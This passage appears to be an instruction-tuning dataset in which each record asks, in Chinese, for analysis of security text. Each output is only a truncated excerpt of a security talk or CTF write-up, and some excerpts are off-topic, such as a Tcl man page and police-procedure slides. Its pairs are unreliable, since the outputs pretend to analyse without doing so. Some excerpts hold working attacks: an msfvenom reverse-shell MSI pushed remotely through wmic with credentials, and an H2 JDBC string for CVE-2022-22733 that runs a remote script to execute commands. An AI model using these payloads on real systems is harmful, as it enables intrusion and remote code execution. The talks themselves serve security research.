Guys Finish First Few if any contemporary computer security controls have prevented a [red team] from easily accessing any information sought. Bad Guys Finish First Few if any contemporary computer security controls have prevented a [red team] from easily accessing any information sought. O>D Doesnt Have to Stay This Way Great News! Security is Getting Better! Whether in detection, control, or prevention, we are notching personal bests - Dan Geer, 2014 Time Effectiveness 2014 Improvement of Defense Bad News! Were Still Losing and at a Faster Rate! Time Effectiveness Improvement of Defense 2014 Whether in detection, control, or prevention, we are notchi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnalyzing and Counter-Attacking Attacker-Implanted Devices Case Study: Pwn Plug Robert Wesley McGrew wesley@mcgrewsecurity.com Introduction In order to bypass restrictions on inbound network traffic, an attacker might find it desirable to implant a hardware device in the target network that would allow that attacker to launch attacks from within the target network. Such devices can be fully functional computers, yet small enough to be hidden and disguised within a target environment. One device, popular with penetration testers (and with the same feature- set as would be useful for a malicious attacker), is the Pwn Plug, from Pwnie Express. The Pwn Plug has the initial appearance of a printer or laptop power supply, but contains a functional computer running a small, but full-featured operating system designed for attacking systems, gathering information, and connecting back to the attacker to report its results. When an attacker-implanted device is discovered in an organization, that organization may wish to perform a forensic analysis of the device in order to determine what systems it has compromised, what information has been gathered, and any information that can help identify the attacker. When a device has been located on the network, it could also be the target of a counterattack, leveraging vulnerabilities in the device itself in order to compromise it and turn it into a system for monitoring the attacker. If the attacker were to retrieve the device for later use in another situation, the same monitoring software would follow. Vulnerabilities in attacker-implanted devices also have implications for penetration testers that are using the devices in authorized situations. If a third-party attacker is able to compromise the hardware and software tools being used by a penetration tester, then both the penetration tester and the testers client have been effectively compromised. An attackers actions may be disregarded by the client as part of the test, or the att", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# The Vault 1 Category: Pwn, 250 Points ## Description > nc challenges.ctfd.io 30440 ## Solution Let's connect to the attached service: ```console root@kali:/media/sf_CTFs/matrix/The_Vault_1# nc challenges.ctfd.io 30440 _____ _ __ __ _ _ _ |_ _|| |__ ___ \\ \\ / / __ _ _ _ | || |_ / | | | | '_ \\ / _ \\ \\ \\ / / / _` || | | || || __| _____ | | | | | | | || __/ \\ V / | (_| || |_| || || |_ |_____| | | |_| |_| |_| \\___| \\_/ \\__,_| \\__,_||_| \\__| |_| ____ ____ ____ ||1 ||||2 ||||3 || ||__||||__||||__|| |/__\\||/__\\||/__\\| ____ ____ ____ ||4 ||||5 ||||6 || ||__||||__||||__|| |/__\\||/__\\||/__\\| ____ ____ ____ ||7 ||||8 ||||9 || ||__||||__||||__|| |/__\\||/__\\||/__\\| ____ ____ ____ ||* ||||0 ||||# || ||__||||__||||__|| |/__\\||/__\\||/__\\| Welcome Agent, we need your help to open a Secure Vault. In order to open the vault you need to submit the correct password. According to our intelligence the password is 624 digits long. Also, we know that the vault has been initialized on 11/02/2021 Good luck !!! ************ Main Menu ************ * * * [ 1 ] ---- Guessing Mode * * [ 2 ] ---- Submit Password * * [-1 ] ---- Quit * * * *********************************** 1 Enter digit number 1 7 Incorrect digit :( bye bye :) ``` We need to guess a 624-digit password for a vault. There's a \"Guessing Mode\" which seems promising, and an option to submit the password. Let's try guessing: ```console ************ Main Menu ************ * * * [ 1 ] ---- Guessing Mode * * [ 2 ] ---- Submit Password * * [-1 ] ---- Quit * * * *********************************** 1 Enter digit number 1 1 Enter digit number 2 1 Incorrect digit :( bye bye :) ``` Well, if we guess the first digit correctly, we can continue to the next digit. Seems easy enough, let's automate. ```python from pwn import * from enum import Enum import string PASSWORD_LENGTH = 624 class MenuChoice(Enum): GUESSING_MODE = 1 SUBMIT_PASSWORD = 2 QUIT = -1 def select_menu(choice: MenuChoice): r.sendlineafter(\"***********************************\\n\\n\", s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH SpinBox 3tk \"tcllib - BWidget\" .SH NAME .B SpinBox - SpinBox 组件 .SH 创建 CREATION .B SpinBox pathName ?option value...? .SH 描述 DESCRIPTION SpinBox 组件使用户能在用 values 选项给出的一个列表或用一个最小值一个最大值和一个增量定义的一组值中选择一个值注意 range 选项定义值的一个列表所以 getvalue 和 setvalue 能操作 values 和 range 二者 .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -modifycmd 指定在用户修改 SpinBox 的值的时候调用的 Tcl 命令 .TP -range 指定描述 SpinBox 的最小值最大值和增量的三个整数的一个列表 .TP -values 指定 SpinBox 接受的值这个选项优先于 range 选项 .SH 组件命令 .TP pathName bind ?arg...? 在录入组件上设置绑定 .TP pathName cget option 返回用 option 给出的配置选项的当前值Option 可以是能被建立命令接受的任何值 .TP pathName configure ?option? ?value option value ...? 查询或修改这个组件的配置选项如果未指定 option 则返回描述 pathName 的所有可获得的选项的一个列表如果指定了不带 value 的 option则这个命令返回描述这个指名的 option 的一个列表(这个列表与未指定 option 所返回的值的相应的子集是一样的)如果指定了一个或多个选项-值 对则这个命令把给定的组件选项修改为给定的值在这种情况下这个命令返回一个空串Option 可以是能被建立命令接受的任何值只读选项不可修改 .TP pathName getvalue 返回 SpinBox 当前文本在值的列表中的索引如果它不匹配任何值则返回 -1 .TP pathName setvalue index 把 SpinBox 的文本设置成用在值的列表中的索引指示的值index 可以被指定为任何下列形式: last 指定值的列表的最后一个元素 first 指定值的列表的第一个元素 next 指定值的列表的当前元素(就是 getvalue 返回的那个)的下一个元素 previous 指定值的列表的当前元素(就是 getvalue 返回的那个)的上一个元素 @number 指定在值的列表的整数索引 .SH 绑定 在 SpinBox 的录入组件获得输入聚焦的时候除了缺省的录入组件绑定之外它还有下列绑定: * Page up 把 SpinBox 的值设置为最后一个值 * Page down 把 SpinBox 的值设置为第一个值 * Arrow up 把 SpinBox 的值设置为下一个值 * Arrow down 把 SpinBox 的值设置为上一个值 .SH \"[中文版维护人]\" .B 寒蝉退士 .SH \"[中文版最新更新]\" .B 2001/05/17 .SH \"中国 Linux 论坛 man 手册页翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n跟IE簽約成為XSS少吧 Make a contract with IE and become a XSS girl! Yosuke HASEGAWA http://utf-8.jp/ 歉意 I'm sorry 謝罪 我從來沒有看過動畫作品 \"魔法少圓魔\" I've never watched the anime \"Puella Magi Madoka Magica\" まどかマギカてません 自我介紹 Who am I? 自己紹介 Yosuke HASEGAWA  NetAgent Co.,Ltd. R&D dept.  Secure Sky Technology Inc. technical adviser  Microsoft MVP for Consumer Security Oct 2005 -  http://utf-8.jp/  開發JavaScript的混淆工具 Writing obfuscated JavaScript 介紹混淆JavaScript Introduction of obfuscated JavaScript 混淆JavaScript javascript:$=~[];$={___:++$,$$$$:(![]+\"\")[$],__$:++$,$_$_:(![]+\"\")[$],_$_:++$, $_$$:({}+\"\")[$],$$_$:($[$]+\"\")[$],_$$:++$,$$$_:(!\"\"+\"\")[$],$__:++$,$_$:++$,$$_ _:({}+\"\")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+\"\")[$.$_$]+($._$= $.$_[$.__$])+($.$$=($.$+\"\")[$.__$])+((!$)+\"\")[$._$$]+($.__=$.$_[$.$$_])+($.$=( !\"\"+\"\")[$.__$])+($._=(!\"\"+\"\")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!\"\"+ \"\")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+\"\\\"\"+$.$_$_+ (![]+\"\")[$._$_]+$.$$$_+\"\\\\\"+$.__$+$.$$_+$._$_+$.__+\"(\\\\\\\"\\\\\"+$.__$+$.__$+$.___ +$.$$$_+(![]+\"\")[$._$_]+(![]+\"\")[$._$_]+$._$+\", \\\\\"+$.__$+$.__$+$._$_+$.$_$_+\"\\\\\"+$.__$+$.$$_+$.$$_+$.$_$_+\"\\\\\"+$.__$+$._$_+$. _$$+$.$$__+\"\\\\\"+$.__$+$.$$_+$._$_+\"\\\\\"+$.__$+$.$_$+$.__$+\"\\\\\"+$.__$+$.$$_+$.__ _+$.__+\"\\\\\\\" )\"+\"\\\"\")())(); javascript:alert(\"Hello, JavaScript\") jjencode - http://utf-8.jp/public/jjencode.html 還可以更人性化! Need ｍore friendly! 表情符號JavaScript JS with emoticon ﾟωﾟﾉ= /ｍﾉ ~ //**/ ['_']; o=(ﾟｰﾟ) =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o_o)/ (o_o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o_o - (ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c_o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o_o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWMI + MSI Lateral Movement NO WIN32_PROCESS NEEDED  EXPANDING THE WMI LATERAL MOVEMENT ARSENAL 原文很棒建议阅读本质上仍然是对wmi的利用 如标题所说利用的WMI执行MSI包一般我们用的 WIN32_PROCESS 类但这里不是 WIN32_PROCESS 类 Execution 使用msfvenom生成一个payload: wmic 对 - 敏感这里使用了双引号避免出现问题 这里的用户前面加了一个 . ,不加 . 会导致拒绝访问,另外要求目标机器本地管理如果是域 环境域管也可 WMIC 任然是通过 rpc 调用的com组件(其实就是DCOM,如果深究如何配置什么用户才能 访问dcom的话在 Dcomcnfg.exe 我的电脑中属性COM安全可以看到默认的访 问权限为 Administrators组 确认目标主机能访问到 payload.msi 这里为了能够访问我设置Desktop共享添加 Everyone\"可读取 我这里node参数使用的是 netbios 主机名使用主机名可能会出现一些问题为了避免这个 问题下面演示全部使用ip 执行之后得到 ReturnValue = 1619 查了下该值代表 ERROR_INSTALL_PACKAGE_OPEN_FAILED 如果直接在通过RDP执行msi会提示一个错误 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.10.128 LPORT=4444 -f msi -o payload.msi #原文payload 是 windows/x64/shell_reverse_tcp #另外有 msi-nouac 格式可输出不要求提升权限的 payload wmic /node:\"PC-jack-0day\" /user:.\\jack /password:admin product call install PackageLocation='\\\\PC-jerry-0day\\c$\\Users\\jerry.0DAY\\Desktop\\payload.msi' #笔者使用的主机名但建议使用ip 虽然弹出这个错误但实际上可以弹shell唯一的问题是在某些版本上会失败比如Windows server 2008 R2笔者测试失败 在stackoverflow中有提到造成这个错误是原因是仅适用于本地路径和本地路径上的UNC 退而求其次将文件复制到远程主机上再执行: net use \\\\192.168.3.62\\c$ admin /user:jack copy \"C:\\Users\\jerry.0DAY\\Desktop\\payload.msi\" \\\\192.168.3.62\\c$\\Users\\jack.0DAY\\Desktop\\payload.msi #这里用的powershellcmd 下建议使用 copy /Y测试过程请选择其他目录 #copy /Y\"C:\\Users\\jerry.0DAY\\Desktop\\payload.msi\" \\\\PC-jack- 0day\\c$\\Users\\jack.0DAY\\Desktop\\payload.msi net use \\\\192.168.3.62\\c$ /del wmic /node:192.168.3.62 /user:.\\jack /password:admin product call install PackageLocation=C:\\Users\\jack.0DAY\\Desktop\\payload.msi #实际使用中一行命令完成 #当然上传下载文件的方式也有很多种这里仅演示最常用的 net use net use \\\\192.168.3.62\\c$ admin /user:jack ; copy \"C:\\Users\\jerry.0DAY\\Desktop\\payload.msi\" \"\\\\192.168.3.62\\c$\\Users\\jack.0DAY\\Desktop\\payload.msi\" ; net use \\\\192.168.3.62\\c$ /del ; wmic /node:192.168.3.62 /user:.\\jack /password:admin product call install PackageLocation=C:\\Users\\jack.0DAY\\Desktop\\payload.msi 既然本质上是在调用WMI 的类Powershel 中的 cmdlets 也能到达同样的效果 之所以是system 权限是因为目标开启了AlwaysInstallElevated 组策略详细的请参考@三", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSocial Networking Special Ops: Extending Data Visualization Tools for Faster Pwnage 1 Chris Sumner | @TheSuggmeister | www.securityg33k.com Tuesday, 3 August 2010 Disclaimer I am not speaking on behalf of my employer. The information and perspectives I present are personal and do not represent those of my employer. 2 Tuesday, 3 August 2010 What yer in for 3 Tuesday, 3 August 2010 What yer in for 1. Intro to Social Network Analysis & Visualization 3 Tuesday, 3 August 2010 What yer in for 1. Intro to Social Network Analysis & Visualization 2. Case study using Twitter & Maltego 3 Tuesday, 3 August 2010 What yer in for 1. Intro to Social Network Analysis & Visualization 2. Case study using Twitter & Maltego 3. Something a bit darker using facebook & Maltego 3 Tuesday, 3 August 2010 Goals 4 Tuesday, 3 August 2010 Goals  Overview/appreciation of possibilities in this field 4 Tuesday, 3 August 2010 Goals  Overview/appreciation of possibilities in this field  Expose you to some ideas that you can apply to your specific situation 4 Tuesday, 3 August 2010 Whos the talk aimed at? 5 This talk Tuesday, 3 August 2010 Whos the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs 1337 Tuesday, 3 August 2010 Whos the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs 1337 Tuesday, 3 August 2010 Whos the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs 1337 Tuesday, 3 August 2010 Whos the talk aimed at? 5 Data Visualization Social Networking Analysis This talk 1337 n00bs Yall probably get it 1337 Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6 Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6  By day  Corporate security Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6  By day  Corporate security  By night | weekend  Data analysis  Data visualization  Social Media  DC4420 Tuesday, 3 August 2010 Who am I? @TheSuggmeister 6  By day  Corporate security  By night | weekend  Data analys", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# c0rrupt Forensics, 250 points ## Description: > We found this file. Recover the flag. ## Solution: Let's see what we can tell about the file: ```console root@kali:/media/sf_CTFs/pico/c0rrupt# file mystery mystery: data root@kali:/media/sf_CTFs/pico/c0rrupt# xxd -g 1 mystery | head 00000000: 89 65 4e 34 0d 0a b0 aa 00 00 00 0d 43 22 44 52 .eN4........C\"DR 00000010: 00 00 06 6a 00 00 04 47 08 02 00 00 00 7c 8b ab ...j...G.....|.. 00000020: 78 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 x....sRGB....... 00000030: 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 ..gAMA......a... 00000040: 00 09 70 48 59 73 aa 00 16 25 00 00 16 25 01 49 ..pHYs...%...%.I 00000050: 52 24 f0 aa aa ff a5 ab 44 45 54 78 5e ec bd 3f R$......DETx..? 00000060: 8e 64 cd 71 bd 2d 8b 20 20 80 90 41 83 02 08 d0 .d.q.-. ..A.... 00000070: f9 ed 40 a0 f3 6e 40 7b 90 23 8f 1e d7 20 8b 3e ..@..n@{.#... .> 00000080: b7 c1 0d 70 03 74 b5 03 ae 41 6b f8 be a8 fb dc ...p.t...Ak..... 00000090: 3e 7d 2a 22 33 6f de 5b 55 dd 3d 3d f9 20 91 88 >}*\"3o.[U.==. .. ``` `file` won't recognize it, but inspecting the header we can see strings which are common in PNG files. According to the [PNG specs], the first 8 bytes of the file are constant, so let's go ahead and fix that: ```console root@kali:/media/sf_CTFs/pico/c0rrupt# cp mystery fixed.png root@kali:/media/sf_CTFs/pico/c0rrupt# printf '\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A' | dd of=fixed.png bs=1 seek=0 count=8 conv=notrunc 8+0 records in 8+0 records out 8 bytes copied, 0.00550841 s, 1.5 kB/s root@kali:/media/sf_CTFs/pico/c0rrupt# xxd -g 1 fixed.png | head 00000000: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 43 22 44 52 .PNG........C\"DR 00000010: 00 00 06 6a 00 00 04 47 08 02 00 00 00 7c 8b ab ...j...G.....|.. 00000020: 78 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 x....sRGB....... 00000030: 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 ..gAMA......a... 00000040: 00 09 70 48 59 73 aa 00 16 25 00 00 16 25 01 49 ..pHYs...%...%.I 00000050: 52 24 f0 aa aa ff a5 ab 44 45 54", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking Oracle with the Metasploit Framework defcon 17 Who Are We? Chris Gates <cg [@] metasploit.com> What pays the bills Pentester for Security Blogger http://carnal0wnage.attackresearch.com Security Twit Carnal0wnage Want more? Chris Gates + carnal0wnage + maltego  Who Are We? Mario Ceballos <mc [@] metasploit.com>  What do I do? Vulnerability Research/Exploit Development. Metasploit Framework Developer. Focus is on auxiliary and exploit modules. Pentesting for some company. Why Oracle? Why the focus on Oracle? Been on lots of pentests & seen lots of potential targets. The Oracle business model allows for free downloads of products, but you pay for updates. The result is tons of potential shells. Privilege Escalation and data theft is pretty easy, but shells are always better. Why Oracle? Why the focus on Oracle? Some support is provided by the commercial attack frameworks, but really dont have much coverage for non-memory corruption vulns. Other tools that target Oracle. Inguma Orasploit (not public) Pangolin (if you want to give your hard earned shell back to .cn) A few free commercial products focused on vulnerability assessment rather than exploitation. Current Metasploit Support Some support for Oracle is already provided. Exploit modules. Handful of memory corruption modules that target earlier versions of Oracle and some of if its other applications. Auxiliary modules. Handful of modules that assist in discovering the SID, Identifying the version, sql injection, post exploitation, and a ntlm stealer. New Metasploit Support Introduction of a TNS Mixin. Handles a basic TNS packet structure. \"(CONNECT_DATA=(COMMAND=#{command})) Used for some of our auxiliary modules. Used for our TNS exploits. Introduction of a ORACLE Mixin. Handles our direct database access. Dependencies: Oracle Instant Client. ruby-dbi. ruby-oci8. New Metasploit Support (cont.) Introduction of a ORACLE Mixin. Exposes a few methods. connect() Establishes a database handle. disconnect() Di", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPolice Criminal Procedure Professor Steve Dunker When Can the Police Make a Stop? An Officer MUST have either: Reasonable Suspicion OR Probable Cause Reasonable Suspicion Quantum of knowledge sufficient to induce an ordinarily prudent and cautious man under similar circumstances to believe criminal activity is at hand (Blacks) 25%+ sure Probable Cause The facts and circumstances within the officers knowledge and of which they had reasonably trustworthy information are sufficient in themselves to warrant a man of reasonable caution in the belief that an offense has been or is being committed. More than 50% sure The Totality of the Circumstances Look at All the information available Such as: Conduct of suspect Incriminating evidence Confessions or admissions Unusual hour Witnesses Answers to questions When can an officer Frisk Reasonably believe criminal activity is afoot. And The suspect may be armed and dangerous What is a Frisk Pat-Down for weapons Looking ONLY for weapons Plain touch contraband may be seized. When Must the Police Inform you of Your Rights? In Custody Under Interrogation Traffic stops do not require Miranda What are your Rights? Remain Silent Any you say will be used against you You have a right to an attorney If you cannot afford an attorney one will be appointed Searches What is a search? Govt. Agent  Invasion of your privacy Reasonable Expectation of Privacy Search incident to an Arrest A valid arrest allows for the search of the person and of the area surrounding the suspect. Motor Vehicle Searches Search of Automobile does not require a warrant. Probable cause is required May examine all containers that could contain evidence. When can the police Kick your door in without Knocking First? Knock and Announce Required Exceptions: Safety or Destruction of evidence The Exclusionary Rule Court Rule Barring Use of Illegally Obtained Evidence Illegal search = No use of evidence in Court. Questions for the Criminal Justice Professor Must be hypothetica", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeceptive Hacking How misdirection can be used to steal information without being detected Bruce Grymoire Barnett Magician & Computer Scientist Magicians and hackers have a lot in common  They like to wear black  They like to shock people  They have Secret Knowledge Assumptions .umptions Ass Magicians Arsenal  Actions  Props  People  Basic Psychology  Misdirection  Advanced Psychological Techniques  Example of the Magician-Hacker Feint  Pretend to do something, but in reality nothing happens (the hand is empty)  A False Show Hack: Purposeful delay, Checking your computer for viruses Bluff  Feint but calling attention to the action  Pretending, when nothing really has happened or will happen. Hack: We have detected a virus on your computer Phish, Used in Social Engineering Sleight  ..is a Secret Action, combined with technique  Sleights are less valuable if they are well known  Sleights may require years of practice  Sleights can be worth money  Sleights are sold with an underground economy  The best sleights look natural Hack: Exploit, Buffer Overflow, 0Day. Etc. Temps or Timing  Timing is used to improve deception  Or make people forget Hack: Planning ahead, low frequency port scan Gimmick  A secret device  Performs some useful function which is unexpected because it is secret Hack: Rootkit Gaff  A visible device with a secret function Hack: Easter Egg, backdoor, hidden function Fake (Feke)  A simulation or emulation of a real device Hack: Trojan Horse, Man-in-the-middle Secret Accomplice, Stooge, Shill, Trusted Insider  Someone who knowingly helps the attacker  The victim does not know the insider is an enemy  The more trusted, the less they are suspected  The Enemy of my Enemy ploy Hack: Insider Threat, Friend Request from stranger Unwitting accomplice  Someone who unknowingly helps  Please forward this to everyone you know  Im trying to help one of your colleagues whos visiting us today Hack: Social Engineering The Patsy, or Fall Guy  Innocent  But takes the bla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nP A G E Uncovering SAP vulnerabilities: Reversing and breaking the Diag protocol Martin Gallo  Core Security Defcon 20  July 2012 P A G E 2 Agenda  Introduction  Motivation and related work  SAP Netweaver architecture and protocols layout  Dissecting and understanding the Diag protocol  Results and findings  Defenses and countermeasures  Conclusion and future work P A G E Introduction 3 P A G E 4 Introduction  Leader business software provider  Sensitive enterprise business processes runs on SAP systems  SAP security became a hot topic  Some components still not well covered  Proprietary protocols used at different components P A G E 5 Introduction  Dynamic Information and Action Gateway (Diag) protocol (aka SAP GUI protocol)  Link between presentation layer (SAP GUI) and application layer (SAP Netweaver)  Present in every SAP NW ABAP AS  Compressed but unencrypted by default  TCP ports 3200 to 3298 P A G E 6 Agenda  Introduction  Motivation and related work  SAP Netweaver architecture and protocols layout  Dissecting and understanding the Diag protocol  Results and findings  Defenses and countermeasures  Conclusion and future work P A G E Motivation and related work 7 P A G E 8 Previous work on Diag protocol Proprietary tools Proxy-like tool Sniffing through reflection- method Compression algorithm disclosed Decompression Wireshark plug-in Cain&Abel sniffing ? P A G E 9 Motivation  Previous work mostly focused on decompression  Protocol inner workings remains unknown  No practical tool for penetration testing 289 836 734 518 2009 2010 2011 2012 # of Security Notes Only 2 out of ~2300 security fixes published by SAP since 2009 affected components related to Diag P A G E 1 0 Agenda  Introduction  Motivation and related work  SAP Netweaver architecture and protocols layout  Dissecting and understanding the Diag protocol  Results and findings  Defenses and countermeasures  Conclusion and future work P A G E SAP Netweaver architecture and protocols layout 1 1 P A G E 1 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow Unique is Your Browser? a report on the Panopticlick experiment Peter Eckersley Senior Staff Technologist Electronic Frontier Foundation pde@eff.org  What is identifying information? Name & address! But also... Latanya Sweeney: ZIP + DOB + gender identifies almost all US residents 7 billion people on earth  typically only ~20,000 per ZIP  divide by 365 for birthday  divide by ~70 for birth year  divide by 2 for gender (on average works for ZIPs up to 50,000) How? Bits of Information We can measure information in bits: Each bit of information required doubles the number of possibilities Each bit of information obtained halves it For instance To identify a human, we need log 2 7 billion = 33 bits Learning someone's birthdate log 2 365.25 = 8.51 bits Surprisal and Entropy Information from a particular value for a variable gives us surprisal or self-information: Birthdate = 1st of March: 8.51 bits Birthdate = 29th of February: 10.51 bits The weighted average for that variable is the entropy of the variable Surprisal of an event I = - log2 Pr(event) Entropy H = Σ Pr(event) . I events Adding surprisals If variables are independent, surprisals add linearly (birthdate + gender are independent) Starsign and birthdate are the opposite Use joint distributions / conditional probability to model this Now for an application... Track  associate the browser's activities: - at different times - with different websites Browser Tracking What ways exist to track browsers? Cookies IP addresses Supercookies And Fingerprints Browser has some combination of characteristics which, like DOB + ZIP + gender, are enough to distinguish it from all others Fingerprint Privacy threats Globally unique? Fingerprint + IP  unique? Occasional cookie undelete? Auto linked cookie? Fingerprinting rumours Analytics companies are using this method DRM systems are using this method Financial systems are using this method How good is it? (Also: how bad is the logging of User Agent strings?) Let's do an exp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-22733 Apache ShardingSphere ElasticJob-UI RCE author:Y4er 分析 看diff https://github.com/apache/shardingsphere-elasticjob- ui/commit/f3afe51221cd2382e59afc4b9544c6c8a4448a99 getToken函数会将this对象转json返回而this对象中存储了root的密码 分析调用关系 handleLogin函数处理登录时会进行判断如果 authenticationResult.isSuccess() 登录成功会返 回getToken() 而handleLogin在 org.apache.shardingsphere.elasticjob.lite.ui.security.AuthenticationFilter#doFilter 使 用用来判断如果是登录的url则进行处理 复现 accessToken字段解码就有root的密码了 拿shell 默认有h2和pgsql Make JDBC Attack Brilliant Again! jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql' -- poc.sql内容如下 CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"123\";}';CALL EXEC ('calc.exe') 文笔垃圾措辞轻浮内容浅显操作生疏不足之处欢迎大师傅们指点和纠正感激不尽", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle I got 99 Problems, but Little Snitch aint one! WHOIS leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT devices and infrastructure endpoints @patrickwardle security for the 21st century career hobby making little snitch our b!tch OUTLINE understanding bypassing reversing owning little snitch versions < 3.6.2 apple os x 10.11 note: UNDERSTANDING LITTLE SNITCH a brief overview the de-facto host firewall for macOS LITTLE SNITCH \"Little Snitch intercepts connection attempts, and lets you decide how to proceed.\" -www.obdev.at little snitch alert in the news (red team vs. palantir) the puzzle pieces LITTLE SNITCH COMPONENTS ring-0 ring-3 (root session) LittleSnitch.kext Little Snitch Daemon Little Snitch Configuration Little Snitch Agent  network, process monitoring 'authentication'   rules management  rules management preferences   ui alerts ring-3 (user/UI session) ring-0 bug BYPASSING LITTLE SNITCH undetected data exfil IMHO; such bypasses aren't bugs or 0days abusing system rules to talk to iCloud LITTLE SNITCH BYPASS 0X1 iCloud little snitch's iCloud rule o rly!?...yes! un-deletable system rule: \"anybody can talk to iCloud\" abusing 'proc-level' trust LITTLE SNITCH BYPASS 0X2 $/python/dylibHijackScanner.py// GPG/Keychain/is/vulnerable/(weak/rpath'd/dylib)/ 'weak/dylib':////'/Libmacgpg.framework/Versions/B/Libmacgpg'// 'LC_RPATH'://////'/Applications/GPG/Keychain.app/Contents/Frameworks' undetected exfil/C&C \"Using Process Infection to Bypass Windows Software Firewalls\" -Phrack,/'04 gpg keychain; allow all dylib hijack 'injection' stop the network filter LITTLE SNITCH BYPASS 0X3 ring-0 method 0xB disable: 0x0 ring-3 LittleSnitch.kext //connect & authenticate to kext // ->see later slides for details :) //input // ->set to 0x0 to disable uint64_t input = 0x0; //stop network filter IOConnectCallScalarMethod(connectPort, 0xB, &input, 0x1, NULL, NULL); 'invisible' to UI //i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAsura: A huge PCAP file analyzer for anomaly packets detection using massive multithreading Ruo Ando Center for Cybersecurity Research and Development National Institute of Informatics DEF CON 26, Aug 12 2018 Outline Too many packets, too few resources - 100,000,000 vs 1000,000,000,000 ASURA: Huge PCAP file vs Massive threads Overview Task based decomposition Selection of features and containers Reduction by massive threads Demo and Experimental results Conclusions Story behind Asura Traffic explosion. Internet Traffic continues to increase at exponential rate, no end in sight. Too many packets, too few professionals. Cyber attack has become more sophisticated. Reference: The Scream @ public domain  The universe is not complicated, there's just a lot of it. - Richard Feynman  Unreasonable Effectiveness of Data If a machine learning program cannot work with a training of a million examples, then the intuitive conclusion follows that it cannot work at all. However, it has become clear that machine learning using a huge dataset with a trillion items can be highly effective in tasks for which machine learning using a sanitized (clean) dataset with a only million items is NOT useful. Chen Sun, Abhinav Shrivastava, Saurabh Singh, Abhinav Gupta,Revisiting Unreasonable Effectiveness of Data in Deep Learning Era, ICCV 2017 https://arxiv.org/abs/1707.02968 100,000,000 